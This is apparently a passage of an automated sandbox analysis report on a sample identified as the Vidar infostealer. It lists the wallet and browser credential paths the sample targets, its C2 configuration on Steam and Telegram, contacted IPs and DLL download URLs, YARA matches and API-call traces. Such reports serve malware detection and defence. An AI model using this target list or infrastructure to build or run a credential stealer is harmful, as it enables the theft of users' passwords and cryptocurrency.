Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90C40 sqlite3_bind_zeroblob,	2_2_6CB90C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90D60 sqlite3_bind_parameter_name,	2_2_6CB90D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB8EA0 sqlite3_clear_bindings,	2_2_6CAB8EA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6CB90B40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB6410 bind,WSAGetLastError,	2_2_6CAB6410
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB60B0 listen,WSAGetLastError,	2_2_6CAB60B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABC030 sqlite3_bind_parameter_count,	2_2_6CABC030
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB6070 PR_Listen,	2_2_6CAB6070
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6CABC050
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA422D0 sqlite3_bind_blob,	2_2_6CA422D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB63C0 PR_Bind,	2_2_6CAB63C0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.191.36.218	unknown	United States	20473	AS-CHOOPAUS	false
23.192.247.89	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
95.217.220.103	unknown	Germany	24940	HETZNER-ASDE	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true

Contacted Domains

Name	IP	Active
steamcommunity.com	23.192.247.89	true
t.me	149.154.167.99	true
cowod.hopto.org	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
https://95.217.220.103/freebl3.dll	true	unknown
https://95.217.220.103/nss3.dll	true	unknown
https://95.217.220.103/vcruntime140.dll	true	unknown
http://107.191.36.218/	false	unknown
https://95.217.220.103/mozglue.dll	true	unknown
https://t.me/fun88rockskek	true	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7ZthFNAqYp.exe

Avira: detected

Found malware configuration

Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: 7ZthFNAqYp.exe	ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe	Virustotal: Detection: 44%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009280A1 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_009280A1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00928048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00928048
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00931E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00931E32
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_0092A7AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB044C0 PK11_PubEncrypt,	2_2_6CB044C0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6CAD4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB04440 PK11_PrivDecrypt,	2_2_6CB04440
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6CB525B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE8670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6CAE8670
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6CB0A650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6CB2A730
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6CB30180
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB043B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6CB043B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB27C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	2_2_6CB27C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	2_2_6CB2BD30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6CAE7D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6CB29EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB03FF0 PK11_PrivDecryptPKCS1,	2_2_6CB03FF0

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack

Uses 32bit PE files

Source: 7ZthFNAqYp.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092B914
